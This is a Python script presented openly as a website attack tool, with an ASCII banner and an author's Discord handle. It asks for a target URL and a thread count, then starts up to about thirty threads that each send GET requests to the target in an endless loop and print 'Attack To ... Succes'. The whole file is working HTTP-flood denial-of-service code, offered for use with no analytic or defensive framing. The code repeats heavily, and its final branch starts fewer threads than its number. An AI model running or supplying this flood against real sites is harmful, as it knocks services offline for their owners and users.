import requests
from threading import Thread
from time import sleep




html = """      _______________________________________________________________________
     |                                                                       |
     |   __       __    ____________    ____            ____    __           |
     |  |  |     |  |  |____    ____|  | __ \          / __ |  |''|          |      
     |  |  |     |  |       |  |       | | \ \        / / | |  |  |          |
     |  |  |_____|  |       |  |       | |  \ \      / /  | |  |  |          |       
     |  |   _____   |       |  |       | |   \ \_,,_/ /   | |  |  |          |
     |  |  |     |  |       |  |       | |    \__,,__/    | |  |  |          |                 
     |  |  |     |  |       |  |       | |                | |  |  |_______   |               
     |  |__|     |__|       |__|       |_|                |_|  |__________|  |
     |                                                                       |
     |_______________________________________________________________________|

                                 Discord : Al-Shammari#6820
"""
print(html)

url = input("Target URL ---> : ")

islemler = """ 

----------------------------------------------------------------
Enter the number of attacks you want To send per second (Max:40)
----------------------------------------------------------------
"""

print(islemler)

thread = input(">>> Attack number : ")



if thread == "1":

    def islem1():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem1)
    t1.start()



elif thread == "2":

    def islem2():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem2)
    t1.start()
    t2 = Thread(target=islem2)
    t2.start()


elif thread == "3":

    def islem3():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem3)
    t1.start()
    t2 = Thread(target=islem3)
    t2.start()
    t3 = Thread(target=islem3)
    t3.start()

elif thread == "4":

    def islem4():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem4)
    t1.start()
    t2 = Thread(target=islem4)
    t2.start()
    t3 = Thread(target=islem4)
    t3.start()
    t4 = Thread(target=islem4)
    t4.start()

elif thread == "5":

    def islem5():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem5)
    t1.start()
    t2 = Thread(target=islem5)
    t2.start()
    t3 = Thread(target=islem5)
    t3.start()
    t4 = Thread(target=islem5)
    t4.start()
    t5 = Thread(target=islem5)
    t5.start()

elif thread == "6":

    def islem6():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem6)
    t1.start()
    t2 = Thread(target=islem6)
    t2.start()
    t3 = Thread(target=islem6)
    t3.start()
    t4 = Thread(target=islem6)
    t4.start()
    t5 = Thread(target=islem6)
    t5.start()
    t6 = Thread(target=islem6)
    t6.start()

elif thread == "7":

    def islem7():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem7)
    t1.start()
    t2 = Thread(target=islem7)
    t2.start()
    t3 = Thread(target=islem7)
    t3.start()
    t4 = Thread(target=islem7)
    t4.start()
    t5 = Thread(target=islem7)
    t5.start()
    t6 = Thread(target=islem7)
    t6.start()
    t7 = Thread(target=islem7)
    t7.start()

elif thread == "8":

    def islem8():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem8)
    t1.start()
    t2 = Thread(target=islem8)
    t2.start()
    t3 = Thread(target=islem8)
    t3.start()
    t4 = Thread(target=islem8)
    t4.start()
    t5 = Thread(target=islem8)
    t5.start()
    t6 = Thread(target=islem8)
    t6.start()
    t7 = Thread(target=islem8)
    t7.start()
    t8 = Thread(target=islem8)
    t8.start()

elif thread == "9":

    def islem9():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem9)
    t1.start()
    t2 = Thread(target=islem9)
    t2.start()
    t3 = Thread(target=islem9)
    t3.start()
    t4 = Thread(target=islem9)
    t4.start()
    t5 = Thread(target=islem9)
    t5.start()
    t6 = Thread(target=islem9)
    t6.start()
    t7 = Thread(target=islem9)
    t7.start()
    t8 = Thread(target=islem9)
    t8.start()
    t9 = Thread(target=islem9)
    t9.start()

elif thread == "10":

    def islem10():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem10)
    t1.start()
    t2 = Thread(target=islem10)
    t2.start()
    t3 = Thread(target=islem10)
    t3.start()
    t4 = Thread(target=islem10)
    t4.start()
    t5 = Thread(target=islem10)
    t5.start()
    t6 = Thread(target=islem10)
    t6.start()
    t7 = Thread(target=islem10)
    t7.start()
    t8 = Thread(target=islem10)
    t8.start()
    t9 = Thread(target=islem10)
    t9.start()
    t10 = Thread(target=islem10)
    t10.start()

elif thread == "11":

    def islem11():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem11)
    t1.start()
    t2 = Thread(target=islem11)
    t2.start()
    t3 = Thread(target=islem11)
    t3.start()
    t4 = Thread(target=islem11)
    t4.start()
    t5 = Thread(target=islem11)
    t5.start()
    t6 = Thread(target=islem11)
    t6.start()
    t7 = Thread(target=islem11)
    t7.start()
    t8 = Thread(target=islem11)
    t8.start()
    t9 = Thread(target=islem11)
    t9.start()
    t10 = Thread(target=islem11)
    t10.start()
    t11 = Thread(target=islem11)
    t11.start()

elif thread == "12":

    def islem12():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem12)
    t1.start()
    t2 = Thread(target=islem12)
    t2.start()
    t3 = Thread(target=islem12)
    t3.start()
    t4 = Thread(target=islem12)
    t4.start()
    t5 = Thread(target=islem12)
    t5.start()
    t6 = Thread(target=islem12)
    t6.start()
    t7 = Thread(target=islem12)
    t7.start()
    t8 = Thread(target=islem12)
    t8.start()
    t9 = Thread(target=islem12)
    t9.start()
    t10 = Thread(target=islem12)
    t10.start()
    t11 = Thread(target=islem12)
    t11.start()
    t12 = Thread(target=islem12)
    t12.start()

elif thread == "13":

    def islem13():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem13)
    t1.start()
    t2 = Thread(target=islem13)
    t2.start()
    t3 = Thread(target=islem13)
    t3.start()
    t4 = Thread(target=islem13)
    t4.start()
    t5 = Thread(target=islem13)
    t5.start()
    t6 = Thread(target=islem13)
    t6.start()
    t7 = Thread(target=islem13)
    t7.start()
    t8 = Thread(target=islem13)
    t8.start()
    t9 = Thread(target=islem13)
    t9.start()
    t10 = Thread(target=islem13)
    t10.start()
    t11 = Thread(target=islem13)
    t11.start()
    t12 = Thread(target=islem13)
    t12.start()
    t13 = Thread(target=islem13)
    t13.start()

elif thread == "14":

    def islem14():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem14)
    t1.start()
    t2 = Thread(target=islem14)
    t2.start()
    t3 = Thread(target=islem14)
    t3.start()
    t4 = Thread(target=islem14)
    t4.start()
    t5 = Thread(target=islem14)
    t5.start()
    t6 = Thread(target=islem14)
    t6.start()
    t7 = Thread(target=islem14)
    t7.start()
    t8 = Thread(target=islem14)
    t8.start()
    t9 = Thread(target=islem14)
    t9.start()
    t10 = Thread(target=islem14)
    t10.start()
    t11 = Thread(target=islem14)
    t11.start()
    t12 = Thread(target=islem14)
    t12.start()
    t13 = Thread(target=islem14)
    t13.start()
    t14 = Thread(target=islem14)
    t14.start()

elif thread == "15":

    def islem15():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem15)
    t1.start()
    t2 = Thread(target=islem15)
    t2.start()
    t3 = Thread(target=islem15)
    t3.start()
    t4 = Thread(target=islem15)
    t4.start()
    t5 = Thread(target=islem15)
    t5.start()
    t6 = Thread(target=islem15)
    t6.start()
    t7 = Thread(target=islem15)
    t7.start()
    t8 = Thread(target=islem15)
    t8.start()
    t9 = Thread(target=islem15)
    t9.start()
    t10 = Thread(target=islem15)
    t10.start()
    t11 = Thread(target=islem15)
    t11.start()
    t12 = Thread(target=islem15)
    t12.start()
    t13 = Thread(target=islem15)
    t13.start()
    t14 = Thread(target=islem15)
    t14.start()
    t15 = Thread(target=islem15)
    t15.start()

elif thread == "16":

    def islem16():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem16)
    t1.start()
    t2 = Thread(target=islem16)
    t2.start()
    t3 = Thread(target=islem16)
    t3.start()
    t4 = Thread(target=islem16)
    t4.start()
    t5 = Thread(target=islem16)
    t5.start()
    t6 = Thread(target=islem16)
    t6.start()
    t7 = Thread(target=islem16)
    t7.start()
    t8 = Thread(target=islem16)
    t8.start()
    t9 = Thread(target=islem16)
    t9.start()
    t10 = Thread(target=islem16)
    t10.start()
    t11 = Thread(target=islem16)
    t11.start()
    t12 = Thread(target=islem16)
    t12.start()
    t13 = Thread(target=islem16)
    t13.start()
    t14 = Thread(target=islem16)
    t14.start()
    t15 = Thread(target=islem16)
    t15.start()
    t16 = Thread(target=islem16)
    t16.start()

elif thread == "17":

    def islem17():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem17)
    t1.start()
    t2 = Thread(target=islem17)
    t2.start()
    t3 = Thread(target=islem17)
    t3.start()
    t4 = Thread(target=islem17)
    t4.start()
    t5 = Thread(target=islem17)
    t5.start()
    t6 = Thread(target=islem17)
    t6.start()
    t7 = Thread(target=islem17)
    t7.start()
    t8 = Thread(target=islem17)
    t8.start()
    t9 = Thread(target=islem17)
    t9.start()
    t10 = Thread(target=islem17)
    t10.start()
    t11 = Thread(target=islem17)
    t11.start()
    t12 = Thread(target=islem17)
    t12.start()
    t13 = Thread(target=islem17)
    t13.start()
    t14 = Thread(target=islem17)
    t14.start()
    t15 = Thread(target=islem17)
    t15.start()
    t16 = Thread(target=islem17)
    t16.start()
    t17 = Thread(target=islem17)
    t17.start()

elif thread == "18":

    def islem18():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem18)
    t1.start()
    t2 = Thread(target=islem18)
    t2.start()
    t3 = Thread(target=islem18)
    t3.start()
    t4 = Thread(target=islem18)
    t4.start()
    t5 = Thread(target=islem18)
    t5.start()
    t6 = Thread(target=islem18)
    t6.start()
    t7 = Thread(target=islem18)
    t7.start()
    t8 = Thread(target=islem18)
    t8.start()
    t9 = Thread(target=islem18)
    t9.start()
    t10 = Thread(target=islem18)
    t10.start()
    t11 = Thread(target=islem18)
    t11.start()
    t12 = Thread(target=islem18)
    t12.start()
    t13 = Thread(target=islem18)
    t13.start()
    t14 = Thread(target=islem18)
    t14.start()
    t15 = Thread(target=islem18)
    t15.start()
    t16 = Thread(target=islem18)
    t16.start()
    t17 = Thread(target=islem18)
    t17.start()
    t18 = Thread(target=islem18)
    t18.start()

elif thread == "19":

    def islem19():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem19)
    t1.start()
    t2 = Thread(target=islem19)
    t2.start()
    t3 = Thread(target=islem19)
    t3.start()
    t4 = Thread(target=islem19)
    t4.start()
    t5 = Thread(target=islem19)
    t5.start()
    t6 = Thread(target=islem19)
    t6.start()
    t7 = Thread(target=islem19)
    t7.start()
    t8 = Thread(target=islem19)
    t8.start()
    t9 = Thread(target=islem19)
    t9.start()
    t10 = Thread(target=islem19)
    t10.start()
    t11 = Thread(target=islem19)
    t11.start()
    t12 = Thread(target=islem19)
    t12.start()
    t13 = Thread(target=islem19)
    t13.start()
    t14 = Thread(target=islem19)
    t14.start()
    t15 = Thread(target=islem19)
    t15.start()
    t16 = Thread(target=islem19)
    t16.start()
    t17 = Thread(target=islem19)
    t17.start()
    t18 = Thread(target=islem19)
    t18.start()
    t19 = Thread(target=islem19)
    t19.start()

elif thread == "20":

    def islem20():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem20)
    t1.start()
    t2 = Thread(target=islem20)
    t2.start()
    t3 = Thread(target=islem20)
    t3.start()
    t4 = Thread(target=islem20)
    t4.start()
    t5 = Thread(target=islem20)
    t5.start()
    t6 = Thread(target=islem20)
    t6.start()
    t7 = Thread(target=islem20)
    t7.start()
    t8 = Thread(target=islem20)
    t8.start()
    t9 = Thread(target=islem20)
    t9.start()
    t10 = Thread(target=islem20)
    t10.start()
    t11 = Thread(target=islem20)
    t11.start()
    t12 = Thread(target=islem20)
    t12.start()
    t13 = Thread(target=islem20)
    t13.start()
    t14 = Thread(target=islem20)
    t14.start()
    t15 = Thread(target=islem20)
    t15.start()
    t16 = Thread(target=islem20)
    t16.start()
    t17 = Thread(target=islem20)
    t17.start()
    t18 = Thread(target=islem20)
    t18.start()
    t19 = Thread(target=islem20)
    t19.start()
    t20 = Thread(target=islem20)
    t20.start()

elif thread == "21":

    def islem21():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem21)
    t1.start()
    t2 = Thread(target=islem21)
    t2.start()
    t3 = Thread(target=islem21)
    t3.start()
    t4 = Thread(target=islem21)
    t4.start()
    t5 = Thread(target=islem21)
    t5.start()
    t6 = Thread(target=islem21)
    t6.start()
    t7 = Thread(target=islem21)
    t7.start()
    t8 = Thread(target=islem21)
    t8.start()
    t9 = Thread(target=islem21)
    t9.start()
    t10 = Thread(target=islem21)
    t10.start()
    t11 = Thread(target=islem21)
    t11.start()
    t12 = Thread(target=islem21)
    t12.start()
    t13 = Thread(target=islem21)
    t13.start()
    t14 = Thread(target=islem21)
    t14.start()
    t15 = Thread(target=islem21)
    t15.start()
    t16 = Thread(target=islem21)
    t16.start()
    t17 = Thread(target=islem21)
    t17.start()
    t18 = Thread(target=islem21)
    t18.start()
    t19 = Thread(target=islem21)
    t19.start()
    t20 = Thread(target=islem21)
    t20.start()
    t21 = Thread(target=islem21)
    t21.start()

elif thread == "22":

    def islem22():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem22)
    t1.start()
    t2 = Thread(target=islem22)
    t2.start()
    t3 = Thread(target=islem22)
    t3.start()
    t4 = Thread(target=islem22)
    t4.start()
    t5 = Thread(target=islem22)
    t5.start()
    t6 = Thread(target=islem22)
    t6.start()
    t7 = Thread(target=islem22)
    t7.start()
    t8 = Thread(target=islem22)
    t8.start()
    t9 = Thread(target=islem22)
    t9.start()
    t10 = Thread(target=islem22)
    t10.start()
    t11 = Thread(target=islem22)
    t11.start()
    t12 = Thread(target=islem22)
    t12.start()
    t13 = Thread(target=islem22)
    t13.start()
    t14 = Thread(target=islem22)
    t14.start()
    t15 = Thread(target=islem22)
    t15.start()
    t16 = Thread(target=islem22)
    t16.start()
    t17 = Thread(target=islem22)
    t17.start()
    t18 = Thread(target=islem22)
    t18.start()
    t19 = Thread(target=islem22)
    t19.start()
    t20 = Thread(target=islem22)
    t20.start()
    t21 = Thread(target=islem22)
    t21.start()
    t22 = Thread(target=islem22)
    t22.start()

elif thread == "23":

    def islem23():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem23)
    t1.start()
    t2 = Thread(target=islem23)
    t2.start()
    t3 = Thread(target=islem23)
    t3.start()
    t4 = Thread(target=islem23)
    t4.start()
    t5 = Thread(target=islem23)
    t5.start()
    t6 = Thread(target=islem23)
    t6.start()
    t7 = Thread(target=islem23)
    t7.start()
    t8 = Thread(target=islem23)
    t8.start()
    t9 = Thread(target=islem23)
    t9.start()
    t10 = Thread(target=islem23)
    t10.start()
    t11 = Thread(target=islem23)
    t11.start()
    t12 = Thread(target=islem23)
    t12.start()
    t13 = Thread(target=islem23)
    t13.start()
    t14 = Thread(target=islem23)
    t14.start()
    t15 = Thread(target=islem23)
    t15.start()
    t16 = Thread(target=islem23)
    t16.start()
    t17 = Thread(target=islem23)
    t17.start()
    t18 = Thread(target=islem23)
    t18.start()
    t19 = Thread(target=islem23)
    t19.start()
    t20 = Thread(target=islem23)
    t20.start()
    t21 = Thread(target=islem23)
    t21.start()
    t22 = Thread(target=islem23)
    t22.start()
    t23 = Thread(target=islem23)
    t23.start()

elif thread == "24":

    def islem24():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem24)
    t1.start()
    t2 = Thread(target=islem24)
    t2.start()
    t3 = Thread(target=islem24)
    t3.start()
    t4 = Thread(target=islem24)
    t4.start()
    t5 = Thread(target=islem24)
    t5.start()
    t6 = Thread(target=islem24)
    t6.start()
    t7 = Thread(target=islem24)
    t7.start()
    t8 = Thread(target=islem24)
    t8.start()
    t9 = Thread(target=islem24)
    t9.start()
    t10 = Thread(target=islem24)
    t10.start()
    t11 = Thread(target=islem24)
    t11.start()
    t12 = Thread(target=islem24)
    t12.start()
    t13 = Thread(target=islem24)
    t13.start()
    t14 = Thread(target=islem24)
    t14.start()
    t15 = Thread(target=islem24)
    t15.start()
    t16 = Thread(target=islem24)
    t16.start()
    t17 = Thread(target=islem24)
    t17.start()
    t18 = Thread(target=islem24)
    t18.start()
    t19 = Thread(target=islem24)
    t19.start()
    t20 = Thread(target=islem24)
    t20.start()
    t21 = Thread(target=islem24)
    t21.start()
    t22 = Thread(target=islem24)
    t22.start()
    t23 = Thread(target=islem24)
    t23.start()
    t24 = Thread(target=islem24)
    t24.start()

elif thread == "25":

    def islem25():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem25)
    t1.start()
    t2 = Thread(target=islem25)
    t2.start()
    t3 = Thread(target=islem25)
    t3.start()
    t4 = Thread(target=islem25)
    t4.start()
    t5 = Thread(target=islem25)
    t5.start()
    t6 = Thread(target=islem25)
    t6.start()
    t7 = Thread(target=islem25)
    t7.start()
    t8 = Thread(target=islem25)
    t8.start()
    t9 = Thread(target=islem25)
    t9.start()
    t10 = Thread(target=islem25)
    t10.start()
    t11 = Thread(target=islem25)
    t11.start()
    t12 = Thread(target=islem25)
    t12.start()
    t13 = Thread(target=islem25)
    t13.start()
    t14 = Thread(target=islem25)
    t14.start()
    t15 = Thread(target=islem25)
    t15.start()
    t16 = Thread(target=islem25)
    t16.start()
    t17 = Thread(target=islem25)
    t17.start()
    t18 = Thread(target=islem25)
    t18.start()
    t19 = Thread(target=islem25)
    t19.start()
    t20 = Thread(target=islem25)
    t20.start()
    t21 = Thread(target=islem25)
    t21.start()
    t22 = Thread(target=islem25)
    t22.start()
    t23 = Thread(target=islem25)
    t23.start()
    t24 = Thread(target=islem25)
    t24.start()
    t25 = Thread(target=islem25)
    t25.start()

elif thread == "26":

    def islem26():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem26)
    t1.start()
    t2 = Thread(target=islem26)
    t2.start()
    t3 = Thread(target=islem26)
    t3.start()
    t4 = Thread(target=islem26)
    t4.start()
    t5 = Thread(target=islem26)
    t5.start()
    t6 = Thread(target=islem26)
    t6.start()
    t7 = Thread(target=islem26)
    t7.start()
    t8 = Thread(target=islem26)
    t8.start()
    t9 = Thread(target=islem26)
    t9.start()
    t10 = Thread(target=islem26)
    t10.start()
    t11 = Thread(target=islem26)
    t11.start()
    t12 = Thread(target=islem26)
    t12.start()
    t13 = Thread(target=islem26)
    t13.start()
    t14 = Thread(target=islem26)
    t14.start()
    t15 = Thread(target=islem26)
    t15.start()
    t16 = Thread(target=islem26)
    t16.start()
    t17 = Thread(target=islem26)
    t17.start()
    t18 = Thread(target=islem26)
    t18.start()
    t19 = Thread(target=islem26)
    t19.start()
    t20 = Thread(target=islem26)
    t20.start()
    t21 = Thread(target=islem26)
    t21.start()
    t22 = Thread(target=islem26)
    t22.start()
    t23 = Thread(target=islem26)
    t23.start()
    t24 = Thread(target=islem26)
    t24.start()
    t25 = Thread(target=islem26)
    t25.start()
    t26 = Thread(target=islem26)
    t26.start()

elif thread == "27":

    def islem27():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem27)
    t1.start()
    t2 = Thread(target=islem27)
    t2.start()
    t3 = Thread(target=islem27)
    t3.start()
    t4 = Thread(target=islem27)
    t4.start()
    t5 = Thread(target=islem27)
    t5.start()
    t6 = Thread(target=islem27)
    t6.start()
    t7 = Thread(target=islem27)
    t7.start()
    t8 = Thread(target=islem27)
    t8.start()
    t9 = Thread(target=islem27)
    t9.start()
    t10 = Thread(target=islem27)
    t10.start()
    t11 = Thread(target=islem27)
    t11.start()
    t12 = Thread(target=islem27)
    t12.start()
    t13 = Thread(target=islem27)
    t13.start()
    t14 = Thread(target=islem27)
    t14.start()
    t15 = Thread(target=islem27)
    t15.start()
    t16 = Thread(target=islem27)
    t16.start()
    t17 = Thread(target=islem27)
    t17.start()
    t18 = Thread(target=islem27)
    t18.start()
    t19 = Thread(target=islem27)
    t19.start()
    t20 = Thread(target=islem27)
    t20.start()
    t21 = Thread(target=islem27)
    t21.start()
    t22 = Thread(target=islem27)
    t22.start()
    t23 = Thread(target=islem27)
    t23.start()
    t24 = Thread(target=islem27)
    t24.start()
    t25 = Thread(target=islem27)
    t25.start()
    t26 = Thread(target=islem27)
    t26.start()
    t27 = Thread(target=islem27)
    t27.start()

elif thread == "28":

    def islem28():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem28)
    t1.start()
    t2 = Thread(target=islem28)
    t2.start()
    t3 = Thread(target=islem28)
    t3.start()
    t4 = Thread(target=islem28)
    t4.start()
    t5 = Thread(target=islem28)
    t5.start()
    t6 = Thread(target=islem28)
    t6.start()
    t7 = Thread(target=islem28)
    t7.start()
    t8 = Thread(target=islem28)
    t8.start()
    t9 = Thread(target=islem28)
    t9.start()
    t10 = Thread(target=islem28)
    t10.start()
    t11 = Thread(target=islem28)
    t11.start()
    t12 = Thread(target=islem28)
    t12.start()
    t13 = Thread(target=islem28)
    t13.start()
    t14 = Thread(target=islem28)
    t14.start()
    t15 = Thread(target=islem28)
    t15.start()
    t16 = Thread(target=islem28)
    t16.start()
    t17 = Thread(target=islem28)
    t17.start()
    t18 = Thread(target=islem28)
    t18.start()
    t19 = Thread(target=islem28)
    t19.start()
    t20 = Thread(target=islem28)
    t20.start()
    t21 = Thread(target=islem28)
    t21.start()
    t22 = Thread(target=islem28)
    t22.start()
    t23 = Thread(target=islem28)
    t23.start()
    t24 = Thread(target=islem28)
    t24.start()
    t25 = Thread(target=islem28)
    t25.start()
    t26 = Thread(target=islem28)
    t26.start()
    t27 = Thread(target=islem28)
    t27.start()
    t28 = Thread(target=islem28)
    t28.start()

elif thread == "29":

    def islem29():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem29)
    t1.start()
    t2 = Thread(target=islem29)
    t2.start()
    t3 = Thread(target=islem29)
    t3.start()
    t4 = Thread(target=islem29)
    t4.start()
    t5 = Thread(target=islem29)
    t5.start()
    t6 = Thread(target=islem29)
    t6.start()
    t7 = Thread(target=islem29)
    t7.start()
    t8 = Thread(target=islem29)
    t8.start()
    t9 = Thread(target=islem29)
    t9.start()
    t10 = Thread(target=islem29)
    t10.start()
    t11 = Thread(target=islem29)
    t11.start()
    t12 = Thread(target=islem29)
    t12.start()
    t13 = Thread(target=islem29)
    t13.start()
    t14 = Thread(target=islem29)
    t14.start()
    t15 = Thread(target=islem29)
    t15.start()
    t16 = Thread(target=islem29)
    t16.start()
    t17 = Thread(target=islem29)
    t17.start()
    t18 = Thread(target=islem29)
    t18.start()
    t19 = Thread(target=islem29)
    t19.start()
    t20 = Thread(target=islem29)
    t20.start()
    t21 = Thread(target=islem29)
    t21.start()
    t22 = Thread(target=islem29)
    t22.start()
    t23 = Thread(target=islem29)
    t23.start()
    t24 = Thread(target=islem29)
    t24.start()
    t25 = Thread(target=islem29)
    t25.start()
    t26 = Thread(target=islem29)
    t26.start()
    t27 = Thread(target=islem29)
    t27.start()
    t28 = Thread(target=islem29)
    t28.start()
    t29 = Thread(target=islem29)
    t29.start()

elif thread == "30":

    def islem30():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem30)
    t1.start()
    t2 = Thread(target=islem30)
    t2.start()
    t3 = Thread(target=islem30)
    t3.start()
    t4 = Thread(target=islem30)
    t4.start()
    t5 = Thread(target=islem30)
    t5.start()
    t6 = Thread(target=islem30)
    t6.start()
    t7 = Thread(target=islem30)
    t7.start()
    t8 = Thread(target=islem30)
    t8.start()
    t9 = Thread(target=islem30)
    t9.start()
    t10 = Thread(target=islem30)
    t10.start()
    t11 = Thread(target=islem30)
    t11.start()
    t12 = Thread(target=islem30)
    t12.start()
    t13 = Thread(target=islem30)
    t13.start()
    t14 = Thread(target=islem30)
    t14.start()
    t15 = Thread(target=islem30)
    t15.start()
    t16 = Thread(target=islem30)
    t16.start()
    t17 = Thread(target=islem30)
    t17.start()
    t18 = Thread(target=islem30)
    t18.start()
    t19 = Thread(target=islem30)
    t19.start()
    t20 = Thread(target=islem30)
    t20.start()
    t21 = Thread(target=islem30)
    t21.start()
    t22 = Thread(target=islem30)
    t22.start()
    t23 = Thread(target=islem30)
    t23.start()
    t24 = Thread(target=islem30)
    t24.start()
    t25 = Thread(target=islem30)
    t25.start()
    t26 = Thread(target=islem30)
    t26.start()
    t27 = Thread(target=islem30)
    t27.start()
    t28 = Thread(target=islem30)
    t28.start()
    t29 = Thread(target=islem30)
    t29.start()
    t30 = Thread(target=islem30)
    t30.start()

elif thread == "31":

    def islem31():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem31)
    t1.start()
    t2 = Thread(target=islem31)
    t2.start()
    t3 = Thread(target=islem31)
    t3.start()
    t4 = Thread(target=islem31)
    t4.start()
    t5 = Thread(target=islem31)
    t5.start()
    t6 = Thread(target=islem31)
    t6.start()
    t7 = Thread(target=islem31)
    t7.start()
    t8 = Thread(target=islem31)
    t8.start()
    t9 = Thread(target=islem31)
    t9.start()
    t10 = Thread(target=islem31)
    t10.start()
    t11 = Thread(target=islem31)
    t11.start()
    t12 = Thread(target=islem31)
    t12.start()
    t13 = Thread(target=islem31)
    t13.start()
    t14 = Thread(target=islem31)
    t14.start()
    t15 = Thread(target=islem31)
    t15.start()
    t16 = Thread(target=islem31)
    t16.start()
    t17 = Thread(target=islem31)
    t17.start()
    t18 = Thread(target=islem31)
    t18.start()
    t19 = Thread(target=islem31)
    t19.start()
    t20 = Thread(target=islem31)
    t20.start()
    t21 = Thread(target=islem31)
    t21.start()
    t22 = Thread(target=islem31)
    t22.start()
    t23 = Thread(target=islem31)
    t23.start()
    t24 = Thread(target=islem31)
    t24.start()
    t25 = Thread(target=islem31)
    t25.start()
    t26 = Thread(target=islem31)
    t26.start()
    t27 = Thread(target=islem31)
    t27.start()
    t28 = Thread(target=islem31)
    t28.start()
    t29 = Thread(target=islem31)
    t29.start()
    t30 = Thread(target=islem31)
    t30.start()
    t31 = Thread(target=islem31)
    t31.start()
    
elif thread == "32":

    def islem32():
        while True:

            bomb = requests.get(url)
            sonuc = bomb.status_code
            writing = "Attack To {} Succes - {}".format(url,sonuc)
            print(writing)

    t1 = Thread(target=islem32)
    t1.start()
    t2 = Thread(target=islem32)
    t2.start()
    t3 = Thread(target=islem32)
    t3.start()
    t4 = Thread(target=islem32)
    t4.start()
    t5 = Thread(target=islem32)
    t5.start()
    t6 = Thread(target=islem32)
    t6.start()
    t7 = Thread(target=islem32)
    t7.start()
    t8 = Thread(target=islem32)
    t8.start()
    t9 = Thread(target=islem32)
    t9.start()
    t10 = Thread(target=islem32)
    t10.start()
    t11 = Thread(target=islem32)
    t11.start()
    t12 = Thread(target=islem32)
    t12.start()
    t13 = Thread(target=islem32)
    t13.start()
    t14 = Thread(target=islem32)
    t14.start()
    t15 = Thread(target=islem32)
    t15.start()
    t16 = Thread(target=islem32)
    t16.start()
    t17 = Thread(target=islem32)
    t17.start()
    t18 = Thread(target=islem32)
    t18.start()
    t19 = Thread(target=islem32)
    t19.start()
    t20 = Thread(target=islem32)
    t20.start()
    t21 = Thread(target=islem32)
    t21.start()
